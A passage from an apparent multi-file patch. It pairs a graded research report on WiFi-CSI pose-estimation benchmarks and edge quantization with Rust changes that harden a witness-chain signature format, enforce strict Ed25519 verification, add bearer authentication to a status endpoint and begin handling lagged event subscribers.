2. **A QAT path for the WiFlow-STD-class edge model.** The in-tree edge work (`RESULTS.md`) has *fully characterized PTQ* (static QDQ conv-only is the int8 sweet spot; dynamic int8 is a no-op on this all-conv architecture) and found the **half model (843k params) strictly dominates the published 2.23M** and **tiny (56k, 295 KB ONNX fp32) holds 94.1% PCK@20**. The one untested lever is **quantization-aware training**, which the general literature says recovers most of the PTQ accuracy gap. That is the next defensible edge win.
|
||||
3. **Criterion-backed regression benches wired into CI** for the real Candle/ONNX forward path. The benches *exist* (`wifi-densepose-nn/benches/{inference,onnx,native_conv}_bench.rs`, `wifi-densepose-train/benches/training_bench.rs`) and `benchmarks/edge-latency/RESULTS.md` shows the methodology is sound (host≠ESP32 caveat made explicit). The gap is turning point-in-time captures into committed regression baselines.
|
||||
|
||||
---
|
||||
|
||||
## 2. Findings per research question
|
||||
|
||||
### RQ1 — Latest WiFi-CSI pose SOTA (2024–2026): published PCK@20 / MPJPE on the standard public benchmarks
|
||||
|
||||
The crucial framing: **"WiFi pose SOTA" splits into two non-comparable tracks** — 3D pose on MM-Fi/Person-in-WiFi-3D (mm-scale MPJPE, standard PCK) vs 2D pose on self-collected sets (image-normalized PCK). The project's flagship reproduction lives in the second track; the academic frontier lives in the first.
|
||||
|
||||
| Method | Venue / Year | Benchmark + split | PCK@20 | MPJPE | Grade |
|
||||
|---|---|---|---|---|---|
|
||||
| **GraphPose-Fi** (arXiv [2511.19105](https://arxiv.org/abs/2511.19105)) | PREPRINT, Nov 2025 | MM-Fi P1, **random split** | **61.1%** | **160.6 mm** (PA-MPJPE 105.0) | numbers MEASURED-in-study (preprint); beats MetaFi++, HPE-Li, DT-Pose |
|
||||
| GraphPose-Fi | same | MM-Fi P1, **cross-subject** | 44.2% | 210.5 mm | same |
|
||||
| GraphPose-Fi | same | MM-Fi P1, **cross-environment** | 12.9% | 302.7 mm | same — the generalization cliff |
|
||||
| **DT-Pose** (arXiv [2501.09411](https://arxiv.org/abs/2501.09411)) | PREPRINT (ICLR'25 OpenReview [aPnLQ6WfQQ](https://openreview.net/forum?id=aPnLQ6WfQQ)), Jan 2025; code [cseeyangchen/DT-Pose](https://github.com/cseeyangchen/DT-Pose) | MM-Fi (domain-gap + topology focus) | not cleanly extractable from abstract | reports MPJPE; self-supervised masked pretrain + topology decode | numbers NOT verified at exact-table level here — flagged |
|
||||
| **Person-in-WiFi-3D** (CVPR 2024, [openaccess](https://openaccess.thecvf.com/content/CVPR2024/html/Yan_Person-in-WiFi_3D_End-to-End_Multi-Person_3D_Pose_Estimation_with_Wi-Fi_CVPR_2024_paper.html)) | **PEER-REVIEWED**, CVPR 2024 | own 97k-frame multi-person set | — (multi-person, not single-PCK) | **91.7 mm (1p) / 108.1 (2p) / 125.3 (3p)** 3D joint error | MEASURED (peer-reviewed); own dataset, not MM-Fi |
|
||||
| **WiFlow-STD** (arXiv [2602.08661](https://arxiv.org/abs/2602.08661), [DY2434 repo](https://github.com/DY2434/WiFlow-WiFi-Pose-Estimation-with-Spatio-Temporal-Decoupling)) | PREPRINT, Apr 2026 | self-collected, 5-subj, **2D, in-domain random** | 97.25% (claimed) | 0.007 m (image-norm) | claimed CLAIMED; **project reproduced 96.09–96.61% (MEASURED, RTX 5080)** after repairing dataset/code |
|
||||
| **PerceptAlign** (arXiv [2601.12252](https://arxiv.org/abs/2601.12252)) | PREPRINT + MobiCom'26 acceptance | own 7-layout cross-domain 3D set | — | 222.4 mm (Scene4) / 317.1 (Scene5), claims −54% cross-env vs SOTA | CLAIMED (preprint); failure mode corroborated |
|
||||
| **Project AetherArena** (ADR-150, [issue #876](https://github.com/ruvnet/RuView/issues/876)) | internal | MM-Fi, **random split**, **torso-PCK** | **81.63% torso-PCK@20** | — | MEASURED-internal; **torso-PCK ≠ GraphPose-Fi standard PCK** |
|
||||
| **Project WiFlow-STD repro** (`benchmarks/wiflow-std/RESULTS.md`) | internal | their data, their split | **96.09–96.61%** | 0.0094–0.0098 m | MEASURED-internal (RTX 5080) |
|
||||
|
||||
**How the project's ~96% compares to the frontier:** It is *not directly comparable*. The 96% is on an easier task (2D, in-domain, image-normalized PCK, single-environment, 5 subjects) than GraphPose-Fi's 61.1% (3D, standard PCK, mm-scale). The project's own MM-Fi-track number (81.63% torso-PCK@20) *appears* to beat GraphPose-Fi's 61.1%, **but only because torso-PCK is a looser normalization** — the project explicitly flags this (ADR-150 cites beating "MultiFormer's 72.25%" under the *same* torso metric, not GraphPose-Fi's). The honest statement: **the project is competitive on in-domain MM-Fi under its own torso metric, and collapses cross-subject exactly as the published frontier does.** No public number lets the project claim "beyond-SOTA" today.
|
||||
|
||||
### RQ2 — What's winning architecturally now (2025–2026)
|
||||
|
||||
The clear trend across the verified 2025–2026 papers:
|
||||
|
||||
- **Graph / skeleton-aware decoders are the current academic SOTA on MM-Fi.** GraphPose-Fi (PREPRINT, Nov 2025) wins by injecting anatomical graph structure into the decoder — exactly the `GraphPose-Fi-style skeleton-aware graph head` ADR-150 §2.2 already names as the planned decoder. *The project's architecture direction matches the frontier.*
|
||||
- **Self-supervised masked pretraining (MAE) is the cross-domain lever, not capacity.** UNSW MAE study (arXiv [2511.18792](https://arxiv.org/abs/2511.18792), PREPRINT, Nov 2025): cross-domain gains scale **log-linearly with pretraining data, unsaturated at 1.3M samples**; ViT-Base adds only 0.4–0.9% over ViT-Small. Recipe: **80% masking, (30,3) small patches**. DT-Pose (arXiv 2501.09411) independently uses masked pretraining + topology constraints for the domain gap. *Caveat (MEASURED in ADR-152 §2.3): UNSW's downstream tasks are classification, not pose — pose transfer remains a hypothesis. The project's own measurement (b) found WiFlow-STD pretrained features give optimization transfer but NOT feature transfer to ESP32 CSI.*
|
||||
- **Spatio-temporal decoupling is the efficiency lever.** WiFlow-STD's whole contribution is decoupling spatial and temporal CSI processing to hit 2.23M params. The project verified the params/FLOPs (MEASURED) and then **beat it**: the half-model (843k) matches accuracy with 0.38× params (`RESULTS.md` efficiency sweep).
|
||||
- **Geometry/layout conditioning is the cross-layout lever.** PerceptAlign (MobiCom'26): fusing transceiver-position embeddings + two-checkerboard calibration, claimed −60% cross-domain. ADR-152 §2.1 already adopted this (`NodeGeometry`, geometry embeddings).
|
||||
- **NOT winning / absent:** diffusion models for CSI pose did not surface in the verified frontier. Full DensePose-UV regression from commodity WiFi remains undemonstrated (ADR-152 F5, MEASURED by full-text screening). No 2025–2026 paper was found that *beats the project's current direction* — the project is tracking, not trailing, the architecture frontier.
|
||||
|
||||
**Verdict RQ2:** the winning stack (MAE pretrain → graph/skeleton decoder → geometry conditioning, ViT-Small-class capacity) is *already the planned ADR-150/152 stack*. The gain available is not a new architecture; it's (a) more heterogeneous pretraining data and (b) honest cross-domain measurement.
|
||||
|
||||
### RQ3 — Edge/quantized inference SOTA for small CSI pose models
|
||||
|
||||
The in-tree edge work (`benchmarks/wiflow-std/RESULTS.md` "Edge optimization" + "Static PTQ" + "Efficiency sweep") is already at or beyond what the public literature offers for this specific model class, and is MEASURED. Key findings to carry forward:
|
||||
|
||||
- **Dynamic INT8 is a trap on all-conv CSI models.** WiFlow-STD has **zero `nn.Linear` layers** (21 Conv1d + 22 Conv2d + BatchNorm). `torch.quantize_dynamic` quantizes 0% of params (dynamic int8 has no conv kernels). MEASURED.
|
||||
- **Static QDQ conv-only PTQ is the int8 sweet spot.** PCK@20 96.60–96.63% (vs fp32 96.68%, dynamic 96.52%), 2.53 MB. All-ops QDQ is strictly worse (−1.4 pt). MEASURED.
|
||||
- **ONNX Runtime fp32 is the real CPU latency win**: 3.2 ms/window batch-1 vs torch 11.0 ms (~3.4×) at parity (2.4e-7). int8 is ~2× *slower* than ONNX fp32 at batch-1 (ConvInteger kernels). MEASURED.
|
||||
- **Smaller-than-published dominates.** half (843k) ≥ full on accuracy; **tiny (56k, 295 KB ONNX fp32, 0.66 ms/win, 94.1% PCK@20)** is the smallest deployable artifact. At tiny scale int8 is a *bad* trade (−1.43 pt for −47 KB). MEASURED.
|
||||
- **General QAT-vs-PTQ context (BLOG/VENDOR):** [NVIDIA TensorRT QAT blog](https://developer.nvidia.com/blog/achieving-fp32-accuracy-for-int8-inference-using-quantization-aware-training-with-tensorrt/), [Ultralytics QAT glossary](https://www.ultralytics.com/glossary/quantization-aware-training-qat), [ONNX Runtime quantization docs](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html): QAT "almost always" recovers accuracy PTQ loses on sensitive models; ONNX Runtime does NOT retrain (QAT must happen in PyTorch, then export QDQ). The [Onboard Optimization survey, arXiv 2505.08793](https://arxiv.org/pdf/2505.08793) (PREPRINT) covers on-device optimization broadly. These are *general* claims, not CSI-pose-specific — grade accordingly.
|
||||
- **Hailo / Pi target (CLAUDE.local.md):** the 4× Pi+Hailo cluster (Hailo-8 @ 26 TOPS / Hailo-10 @ 40 TOPS) needs a **HEF** compile path, which is its own toolchain (not ONNX/Candle). No in-tree HEF benchmark exists yet — this is a genuine gap for the edge-inference claim.
|
||||
|
||||
**Actionable for an inference-speed benchmark:** the honest comparand set is `{torch fp32, ONNX fp32, ONNX static-QDQ-conv-only int8, candle fp32}` × `{full, half, tiny}` on a fixed host, with the **host≠ESP32 / host≠Hailo caveat stated up front** (the `edge-latency/RESULTS.md` template already does this correctly). The one new datapoint worth producing: **QAT-int8 on the half model** to test whether QAT closes the PTQ −0.16 pt gap *and* keeps the size win.
|
||||
|
||||
### RQ4 — Rigorous, reproducible benchmark methodology
|
||||
|
||||
The repo already demonstrates the right methodology in three places — the ADR should codify it, not invent it:
|
||||
|
||||
- **`benchmarks/wiflow-std/RESULTS.md`** — the gold standard already in-tree: pinned upstream commit, seed-42 file-level split documented, corruption masks committed as ground truth, every forced deviation recorded, mean-pose honesty baseline, MEASURED-vs-CLAIMED grading.
|
||||
- **`benchmarks/edge-latency/RESULTS.md`** — criterion 0.5, explicit host machine, low/median/high brackets, contention caveat, host≠ESP32 separation, steady-state-vs-cold-start distinction.
|
||||
- **Rust micro-bench:** criterion benches already exist in both crates (`wifi-densepose-nn/benches/`, `wifi-densepose-train/benches/`).
|
||||
|
||||
What a credible "beyond-SOTA" claim requires (the bar that survives "prove it"):
|
||||
1. **One locked accuracy definition** — PCK normalization (torso vs absolute vs bbox), keypoint convention (15 vs 17 COCO), and split (random / cross-subject / cross-environment) declared *before* the run. The retracted 92.9% died exactly because PCK normalization was unstated.
|
||||
2. **A mean-pose / constant-output honesty baseline** on every split (already done in measurement (b) — a single-subject near-static set scored 95.9% torso-PCK@20 with a *constant* pose). Any claim must beat this.
|
||||
3. **MEASURED-vs-CLAIMED grading** per number, with the exact command and raw-JSON path committed.
|
||||
4. **Cross-domain, not just in-domain.** In-domain PCK is saturated and uninformative; the defensible claim is on cross-subject/cross-environment, where the frontier is 12–44% PCK@20.
|
||||
|
||||
---
|
||||
|
||||
## 3. Proposed benchmark-suite design
|
||||
|
||||
A two-part suite (`wifi-densepose-train` accuracy harness + `wifi-densepose-nn` latency harness), both committing raw JSON + a graded RESULTS.md.
|
||||
|
||||
### 3.1 Accuracy harness (`wifi-densepose-train`)
|
||||
|
||||
- **Metric module with one canonical PCK** (parameterized: `{torso, bbox, absolute}` normalization × threshold × keypoint-map), so a single function scores WiFlow-STD-repro, MM-Fi/AetherArena, and a GraphPose-Fi re-run identically. Lock the default to **torso-PCK@20 on 17-kp COCO** and *always* also print standard-PCK to expose the gap.
|
||||
- **Fixed datasets/splits:** (i) WiFlow-STD cleaned 360k (their split, for repro parity), (ii) MM-Fi P1 random + cross-subject + cross-environment (to line up against GraphPose-Fi 61.1/44.2/12.9 and the project's 81.63), (iii) ESP32 paired eval set when ≥2k multi-subject windows exist.
|
||||
- **Mandatory honesty baselines** emitted every run: mean-pose, constant-output, and (for cross-domain) source-only.
|
||||
- **Output:** raw JSON + a RESULTS.md table with MEASURED/CLAIMED grades, mirroring `benchmarks/wiflow-std/RESULTS.md`.
|
||||
|
||||
### 3.2 Latency/size harness (`wifi-densepose-nn`)
|
||||
|
||||
- **Matrix:** `{torch fp32 (ref), ONNX fp32, ONNX static-QDQ-conv-only int8, candle fp32}` × `{full 2.23M, half 843k, tiny 56k}` × `{batch 1, 64}`, criterion-timed, host declared.
|
||||
- **Report:** disk size, batch-1 + batch-64 ms/window (median + low/high), and PCK@20 on the locked 10k-window subset, so latency and accuracy never get cited apart.
|
||||
- **Caveat block up front:** host ≠ ESP32-S3/WASM3, host ≠ Hailo HEF. No host number is presented as the edge number.
|
||||
- **CI gate:** commit the current medians as regression baselines; fail PRs that regress latency >X% or accuracy >Y pt.
|
||||
|
||||
### 3.3 What counts as a defensible "beyond-SOTA" result
|
||||
|
||||
A claim is citable only if **all** hold: (1) scored under a pre-declared metric/split, (2) beats the relevant published frontier number *on the same metric definition* (e.g. >61.1% standard-PCK@20 on MM-Fi random, or >12.9% on cross-environment), (3) beats the mean-pose honesty baseline, (4) raw JSON + exact command committed, (5) graded MEASURED. The single most valuable "beyond-SOTA" target is **cross-environment MM-Fi**, where the published bar (12.9% PCK@20) is low enough that a real win is both achievable and unambiguous.
|
||||
|
||||
---
|
||||
|
||||
## 4. Gap table
|
||||
|
||||
| Capability | Project current (graded) | Published SOTA (graded) | Proposed target | Data / hardware needed |
|
||||
|---|---|---|---|---|
|
||||
| In-domain 2D PCK@20 (self-collected) | 96.09–96.61% (MEASURED, RTX 5080, WiFlow-STD repro) | 97.25% claimed (WiFlow-STD, CLAIMED) | match within noise + own architecture | cleaned 360k dataset (have); already met |
|
||||
| In-domain MM-Fi PCK@20 (torso-norm) | 81.63% torso-PCK (MEASURED-internal) | GraphPose-Fi 61.1% *standard*-PCK (PREPRINT) — **not comparable** | re-score both under **one** PCK def | MM-Fi P1 (have); unified metric harness (gap) |
|
||||
| **Cross-subject MM-Fi PCK@20** | ~11.6% torso (MEASURED, the cliff) | GraphPose-Fi 44.2% standard (PREPRINT) | close gap via MAE pretrain + graph decoder | 1.3M heterogeneous CSI corpus (ADR-150/152 §2.3), ViT-Small encoder |
|
||||
| **Cross-environment MM-Fi PCK@20** | untested-internal | GraphPose-Fi 12.9% standard (PREPRINT) | **beat 12.9% → cleanest beyond-SOTA win** | MM-Fi cross-env split + geometry conditioning (ADR-152 §2.1) |
|
||||
| ESP32 CSI→pose (17-kp) | no run beats mean-pose baseline (MEASURED, measurement b) | n/a (no public ESP32 pose benchmark) | beat mean-pose on temporal split | ≥2k multi-subject/multi-position paired windows (gap) |
|
||||
| Edge int8 size/accuracy | static QDQ conv-only 96.61% @ 2.53 MB; tiny 94.1% @ 295 KB fp32 (MEASURED) | no model-matched public number | **QAT-int8 on half model** (untested lever) | PyTorch QAT + QDQ export; RTX 5080 (have) |
|
||||
| Edge CPU latency | ONNX fp32 3.2 ms/win b1 host (MEASURED) | n/a (model-specific) | committed criterion regression baseline | host bench (have); ESP32/Hailo on-hardware (gap) |
|
||||
| Hailo HEF edge inference | none in-tree (gap) | n/a | first MEASURED HEF latency | Hailo compile toolchain + Pi cluster (have hardware, CLAUDE.local.md) |
|
||||
| Foundation encoder (MAE) | recipe adopted, untrained (ADR-152 §2.3) | UNSW: log-linear cross-domain scaling on *classification* (PREPRINT) | pose-transfer validation (hypothesis today) | 1.3M-sample corpus aggregation (priority per F3) |
|
||||
|
||||
---
|
||||
|
||||
## 5. Sources (graded)
|
||||
|
||||
| Source | Type | Grade | Used for |
|
||||
|---|---|---|---|
|
||||
| GraphPose-Fi, arXiv [2511.19105](https://arxiv.org/abs/2511.19105) | preprint | PREPRINT; table numbers MEASURED-in-study (fetched + quoted) | RQ1 MM-Fi frontier (61.1/44.2/12.9 PCK@20, 160.6/210.5/302.7 mm) |
|
||||
| WiFlow-STD, arXiv [2602.08661](https://arxiv.org/abs/2602.08661) + [DY2434 repo](https://github.com/DY2434/WiFlow-WiFi-Pose-Estimation-with-Spatio-Temporal-Decoupling) | preprint+code | numbers CLAIMED; artifacts MEASURED; **project repro 96% MEASURED** | RQ1/RQ2/RQ3 |
|
||||
| PerceptAlign, arXiv [2601.12252](https://arxiv.org/abs/2601.12252) | preprint + MobiCom'26 acceptance | CLAIMED numbers; failure mode corroborated | RQ1/RQ2 geometry conditioning |
|
||||
| UNSW MAE, arXiv [2511.18792](https://arxiv.org/abs/2511.18792) | preprint | ablations MEASURED-in-study; pose transfer = hypothesis | RQ2 MAE recipe |
|
||||
| DT-Pose, arXiv [2501.09411](https://arxiv.org/abs/2501.09411), OpenReview [aPnLQ6WfQQ](https://openreview.net/forum?id=aPnLQ6WfQQ), [code](https://github.com/cseeyangchen/DT-Pose) | preprint+code (ICLR'25) | exact MPJPE table NOT verified here — flagged | RQ2 masked-pretrain + topology |
|
||||
| Person-in-WiFi-3D, [CVPR 2024](https://openaccess.thecvf.com/content/CVPR2024/html/Yan_Person-in-WiFi_3D_End-to-End_Multi-Person_3D_Pose_Estimation_with_Wi-Fi_CVPR_2024_paper.html) | peer-reviewed | MEASURED (91.7/108.1/125.3 mm); own dataset | RQ1 3D multi-person frontier |
|
||||
| ONNX Runtime quantization [docs](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html) | vendor docs | VENDOR | RQ3 PTQ/QAT mechanics |
|
||||
| NVIDIA TensorRT QAT [blog](https://developer.nvidia.com/blog/achieving-fp32-accuracy-for-int8-inference-using-quantization-aware-training-with-tensorrt/), [Ultralytics](https://www.ultralytics.com/glossary/quantization-aware-training-qat) | vendor/blog | BLOG/VENDOR; general, not CSI-specific | RQ3 QAT>PTQ context |
|
||||
| Onboard Optimization survey, arXiv [2505.08793](https://arxiv.org/pdf/2505.08793) | preprint | PREPRINT | RQ3 on-device optimization landscape |
|
||||
| In-tree `benchmarks/wiflow-std/RESULTS.md`, `benchmarks/edge-latency/RESULTS.md`, ADR-150, ADR-152, ADR-015 | internal MEASURED | MEASURED-internal | grounding, all RQs |
|
||||
|
||||
**Unverified / flagged:** DT-Pose exact MM-Fi MPJPE table not extracted at primary-source precision (abstract-level only). GraphPose-Fi parameter count not reported in the paper. WiFlow-STD/PerceptAlign accuracy numbers are author-self-reported preprints. No CSI-pose-specific QAT benchmark exists in the public literature — the QAT recommendation rests on general (non-CSI) vendor/blog evidence.
|
||||
@@ -102,19 +102,43 @@ pub struct WitnessEvent {
|
||||
pub this_hash: WitnessHash,
|
||||
}
|
||||
|
||||
/// Domain-separation tag prefixing every witness canonical message.
|
||||
///
|
||||
/// This is the *domain tag* half of the "domain-tag + length-prefix"
|
||||
/// rule for any hashed/signed message whose fields are
|
||||
/// operator-influenceable. The witness chain already length-prefixes
|
||||
/// `kind` and `payload` (preventing intra-protocol concatenation
|
||||
/// forgery); the tag adds cross-protocol separation so a SHA-256
|
||||
/// preimage / Ed25519 message produced here can never be re-interpreted
|
||||
/// as a message from another signing context that shares key
|
||||
/// infrastructure — notably ADR-116's *manifest* `binary_signature`
|
||||
/// (Ed25519 over `binary_sha256`), which ADR-262 P2 reuses this exact
|
||||
/// chain for. A signature is only ever valid for the one domain whose
|
||||
/// tag it commits to.
|
||||
///
|
||||
/// The trailing NUL terminates the version string so a future
|
||||
/// migration (Blake3, extra fields, Merkle tier) bumps the tag instead
|
||||
/// of silently colliding with v1 bundles.
|
||||
pub const WITNESS_DOMAIN_TAG: &[u8] = b"cog-ha-matter/witness-event/v1\x00";
|
||||
|
||||
/// Compute the canonical-bytes form an event is hashed over.
|
||||
///
|
||||
/// The format is intentionally simple and length-prefixed so a
|
||||
/// future migration can be staged with a `version` byte in front
|
||||
/// without ambiguity:
|
||||
/// The format is domain-tagged and length-prefixed:
|
||||
///
|
||||
/// ```text
|
||||
/// prev_hash[32] | seq:u64-be | ts:u64-be | kind_len:u32-be | kind | payload_len:u32-be | payload
|
||||
/// DOMAIN_TAG | prev_hash[32] | seq:u64-be | ts:u64-be
|
||||
/// | kind_len:u32-be | kind | payload_len:u32-be | payload
|
||||
/// ```
|
||||
///
|
||||
/// Length-prefixing prevents the classic "concatenation forgery"
|
||||
/// attack where `"abc" + "def"` and `"ab" + "cdef"` would hash the
|
||||
/// same.
|
||||
/// * The leading [`WITNESS_DOMAIN_TAG`] gives cross-protocol
|
||||
/// separation: bytes signed/hashed here cannot be replayed as a
|
||||
/// message for another Ed25519 context in the same trust chain
|
||||
/// (e.g. the manifest `binary_signature`). It also carries a format
|
||||
/// version for staged migrations.
|
||||
/// * Length-prefixing `kind` and `payload` prevents the classic
|
||||
/// "concatenation forgery" where `"abc" + "def"` and `"ab" + "cdef"`
|
||||
/// would hash the same. The fixed-width `prev_hash`/`seq`/`ts`
|
||||
/// fields are self-delimiting.
|
||||
pub fn canonical_bytes(
|
||||
prev_hash: WitnessHash,
|
||||
seq: u64,
|
||||
@@ -123,7 +147,10 @@ pub fn canonical_bytes(
|
||||
payload: &[u8],
|
||||
) -> Vec<u8> {
|
||||
let kind_bytes = kind.as_bytes();
|
||||
let mut out = Vec::with_capacity(32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len());
|
||||
let mut out = Vec::with_capacity(
|
||||
WITNESS_DOMAIN_TAG.len() + 32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len(),
|
||||
);
|
||||
out.extend_from_slice(WITNESS_DOMAIN_TAG);
|
||||
out.extend_from_slice(&prev_hash.0);
|
||||
out.extend_from_slice(&seq.to_be_bytes());
|
||||
out.extend_from_slice(×tamp_unix_s.to_be_bytes());
|
||||
@@ -466,11 +493,51 @@ mod tests {
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canonical_bytes_starts_with_prev_hash() {
|
||||
fn canonical_bytes_starts_with_domain_tag_then_prev_hash() {
|
||||
// Locks the on-wire format. A future migration that flips
|
||||
// field order must bump a version byte and update this test.
|
||||
// field order must bump the domain tag and update this test.
|
||||
let bytes = canonical_bytes(WitnessHash([7u8; 32]), 1, 2, "k", b"p");
|
||||
assert_eq!(&bytes[..32], &[7u8; 32]);
|
||||
let tag = WITNESS_DOMAIN_TAG.len();
|
||||
assert_eq!(&bytes[..tag], WITNESS_DOMAIN_TAG);
|
||||
assert_eq!(&bytes[tag..tag + 32], &[7u8; 32]);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canonical_bytes_is_domain_separated() {
|
||||
// Cross-protocol separation: the witness preimage must begin
|
||||
// with the domain tag so its SHA-256 / Ed25519 message can
|
||||
// never be reinterpreted as a message from another signing
|
||||
// context that shares key infrastructure (e.g. the manifest
|
||||
// `binary_signature` over `binary_sha256`). Fails on the old
|
||||
// un-tagged encoding, which began directly with `prev_hash`.
|
||||
let bytes = canonical_bytes(WitnessHash::GENESIS, 0, 0, "k", b"p");
|
||||
assert!(
|
||||
bytes.starts_with(WITNESS_DOMAIN_TAG),
|
||||
"canonical message is not domain-separated"
|
||||
);
|
||||
// The tag is versioned and NUL-terminated.
|
||||
assert!(WITNESS_DOMAIN_TAG.ends_with(b"\x00"));
|
||||
assert!(WITNESS_DOMAIN_TAG.windows(2).any(|w| w == b"v1"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn witness_preimage_cannot_collide_with_a_bare_manifest_digest() {
|
||||
// The manifest `binary_signature` signs a bare 64-byte
|
||||
// SHA-256 hex string. A witness preimage must never *equal*
|
||||
// such a string, even if an operator crafted kind/payload to
|
||||
// try — the domain tag (33 bytes) + fixed 48-byte prefix make
|
||||
// the witness message structurally longer and tag-distinct.
|
||||
// Fails on the old encoding only if it could ever produce a
|
||||
// 64-byte all-hex message; the tag makes the impossibility
|
||||
// explicit and regression-guarded.
|
||||
let manifest_digest_msg = "a".repeat(64); // 64 ASCII hex bytes
|
||||
let witness = canonical_bytes(WitnessHash::GENESIS, 0, 0, "", b"");
|
||||
assert_ne!(witness.as_slice(), manifest_digest_msg.as_bytes());
|
||||
assert!(
|
||||
witness.len() > manifest_digest_msg.len(),
|
||||
"domain tag must make witness preimage structurally distinct"
|
||||
);
|
||||
assert!(!witness.starts_with(b"aaaa"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
|
||||
@@ -36,7 +36,7 @@
|
||||
//! key store (separate concern). Tests use a fixed-bytes seed for
|
||||
//! determinism — never check in real Seed keys here.
|
||||
|
||||
use ed25519_dalek::{Signature, Signer, SigningKey, Verifier, VerifyingKey};
|
||||
use ed25519_dalek::{Signature, Signer, SigningKey, VerifyingKey};
|
||||
|
||||
use crate::witness::{canonical_bytes, WitnessEvent};
|
||||
|
||||
@@ -58,6 +58,16 @@ pub fn sign_event(event: &WitnessEvent, key: &SigningKey) -> Signature {
|
||||
/// Verify an Ed25519 signature against a witness event using the
|
||||
/// Seed's public key. `Ok(())` iff the signature is valid for the
|
||||
/// event's canonical bytes under this key.
|
||||
///
|
||||
/// Uses `verify_strict` (not the permissive `Verifier::verify`) on
|
||||
/// purpose: for a tamper-evident *audit* chain the signature is the
|
||||
/// attestation, so non-canonical encodings and small-order public
|
||||
/// keys must be rejected. `verify_strict` enforces RFC 8032's
|
||||
/// stricter checks, giving the "one canonical signature per event"
|
||||
/// property an auditor relies on when comparing or deduplicating
|
||||
/// signed witness records. The public key is caller-pinned (the
|
||||
/// Seed's known verifying key) — never parsed from the event — so a
|
||||
/// forged event carrying its own key cannot self-verify.
|
||||
pub fn verify_signature(
|
||||
event: &WitnessEvent,
|
||||
signature: &Signature,
|
||||
@@ -71,7 +81,7 @@ pub fn verify_signature(
|
||||
&event.payload,
|
||||
);
|
||||
public_key
|
||||
.verify(&bytes, signature)
|
||||
.verify_strict(&bytes, signature)
|
||||
.map_err(|_| SignatureVerifyError::Invalid)
|
||||
}
|
||||
|
||||
@@ -140,6 +150,58 @@ mod tests {
|
||||
verify_signature(&event, &sig, &public).expect("clean signature verifies");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn signature_commits_to_domain_tag_not_bare_fields() {
|
||||
// The signature is over the domain-tagged canonical bytes. A
|
||||
// signature produced over the *un-tagged* concatenation of the
|
||||
// same fields must NOT verify — proving cross-protocol
|
||||
// separation reaches the signature layer, not just the hash.
|
||||
// Fails on the old encoding where the signed message began
|
||||
// directly with `prev_hash` (no tag).
|
||||
use ed25519_dalek::Signer;
|
||||
let key = fixed_key();
|
||||
let public = key.verifying_key();
|
||||
let event = fresh_event();
|
||||
|
||||
// Hand-build the OLD (un-tagged) preimage and sign it.
|
||||
let mut untagged = Vec::new();
|
||||
untagged.extend_from_slice(&event.prev_hash.0);
|
||||
untagged.extend_from_slice(&event.seq.to_be_bytes());
|
||||
untagged.extend_from_slice(&event.timestamp_unix_s.to_be_bytes());
|
||||
untagged.extend_from_slice(&(event.kind.len() as u32).to_be_bytes());
|
||||
untagged.extend_from_slice(event.kind.as_bytes());
|
||||
untagged.extend_from_slice(&(event.payload.len() as u32).to_be_bytes());
|
||||
untagged.extend_from_slice(&event.payload);
|
||||
let old_sig = key.sign(&untagged);
|
||||
|
||||
// The current verifier (which uses the domain-tagged message)
|
||||
// must reject a signature made over the un-tagged bytes.
|
||||
let err = verify_signature(&event, &old_sig, &public).unwrap_err();
|
||||
assert_eq!(err, SignatureVerifyError::Invalid);
|
||||
|
||||
// Sanity: the proper signature still verifies.
|
||||
let good = sign_event(&event, &key);
|
||||
verify_signature(&event, &good, &public).expect("tagged signature verifies");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn verify_uses_strict_path_and_pins_caller_key() {
|
||||
// Regression guard: verification must run through the strict
|
||||
// path against a CALLER-supplied key. A wrong key fails; the
|
||||
// event never carries its own verifying key, so a forged event
|
||||
// cannot self-attest. (verify_strict additionally rejects
|
||||
// non-canonical / small-order encodings.)
|
||||
let key = fixed_key();
|
||||
let wrong = SigningKey::from_bytes(b"another-wrong-key-another-wrong-");
|
||||
let event = fresh_event();
|
||||
let sig = sign_event(&event, &key);
|
||||
verify_signature(&event, &sig, &key.verifying_key()).expect("right key verifies");
|
||||
assert_eq!(
|
||||
verify_signature(&event, &sig, &wrong.verifying_key()).unwrap_err(),
|
||||
SignatureVerifyError::Invalid
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn verify_rejects_signature_under_wrong_key() {
|
||||
let key = fixed_key();
|
||||
|
||||
@@ -12,8 +12,20 @@ use crate::state::SharedState;
|
||||
#[derive(Serialize)]
|
||||
pub struct ApiRunning { message: &'static str }
|
||||
|
||||
pub async fn api_root() -> Json<ApiRunning> {
|
||||
Json(ApiRunning { message: "API running." })
|
||||
/// `GET /api/` — the HA `APIStatusView` ("API running." ping).
|
||||
///
|
||||
/// Security (HC-API-AUTH-01): HA's `APIStatusView` inherits
|
||||
/// `requires_auth = True` from `HomeAssistantView`, so an unauthenticated
|
||||
/// (or wrong-token) request to `/api/` returns **401**, not 200. HA
|
||||
/// clients (and the companion app) rely on this status route as a
|
||||
/// *token-validation probe* — a 200 here would tell a client a bad token
|
||||
/// is good, and would let an unauthenticated party confirm a live
|
||||
/// HOMECORE-API endpoint. The P2 handler skipped the bearer gate that
|
||||
/// every sibling route applies; this restores wire-compat by validating
|
||||
/// the bearer like `get_config`/`get_states` before replying.
|
||||
pub async fn api_root(headers: HeaderMap, State(s): State<SharedState>) -> ApiResult<Json<ApiRunning>> {
|
||||
let _ = BearerAuth::from_headers(&headers, s.tokens()).await?;
|
||||
Ok(Json(ApiRunning { message: "API running." }))
|
||||
}
|
||||
|
||||
#[derive(Serialize)]
|
||||
|
||||
@@ -298,7 +298,17 @@ impl Connection {
|
||||
}
|
||||
}
|
||||
Ok(_) => {}
|
||||
Err(_) => break,
|
||||
// A slow consumer that falls >4,096 events behind
|
||||
// gets `Lagged(n)`, which is RECOVERABLE: the bus
|
||||
// doc (`bus.rs` §"Lagged receivers must re-sync")
|
||||
// and HA's WS contract both keep the subscription
|
||||
// alive across a lag. The pre-fix `Err(_) => break`
|
||||
// treated `Lagged` as fatal, silently killing the
|
||||
